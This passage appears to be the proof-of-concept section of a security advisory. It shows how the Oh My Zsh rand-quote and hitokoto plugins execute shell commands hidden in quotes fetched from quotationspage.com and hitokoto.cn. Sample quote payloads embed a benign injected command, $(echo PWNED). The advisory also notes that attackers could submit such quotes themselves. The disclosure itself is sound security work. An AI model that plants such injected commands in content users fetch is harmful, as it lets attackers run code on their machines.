**Exploit PoC**: 1. Install Oh My Zsh. 2. Enable the `rand-quote` or `hitokoto` plugins. 3. Optional: run `quote` or `hitokoto` functions in a precmd hook: ```zsh add-zsh-hook precmd quote add-zsh-hook precmd hitokoto ``` 4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either `$(<injected-command>`, <code>\`\<injected-command\>\`</code> or `${(e):-"<injected-command>"}`. - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part): ```plain ... <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class="quote"><a title="Click for further information about this quotation" href="/quote/31081.html">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class="author"><div class="icons"><a title="Further information about this quotation" href="/quote/31081.html"><img src="/icon_info.gif" width="16" height="16" alt="[info]" border="0"></a><a title="Add to Your Quotations Page" href="/myquotations.php?add=31081"><img src="/icon_plus.gif" width="16" height="16" alt="[add]" border="0"></a><a title="Email this quotation" href="/quote/31081.html#email"><img src="/icon_email.gif" width="16" height="16" alt="[mail]" border="0"></a><img src="/icon_blank.gif" width="16" height="16" alt="" border="0"></div><b><a href="/quotes/Oprah_Winfrey/">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd> ... ``` Which would be printed by `print -P` as: ```console $ quote Oprah Winfrey: “Whatever you fear most has no powerPWNED - it is your fear that has the power.” ``` Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it. - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part): ```plain {"id":7474,"uuid":"0467d7cf-bca2-4cee-81ab-0b0640e51069","hitokoto":"她拨弄琴弦，$(echo PWNED)扬起潮汐。","type":"e","from":"原创","from_who":"我","creator":"鸢尾","creator_uid":9969,"reviewer":4756,"commit_from":"web","created_at":"1627968443","length":11} ``` Which would be printed by `print -P` as: ```console $ hitokoto 原创: “她拨弄琴弦，PWNED扬起潮汐。” ``` `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.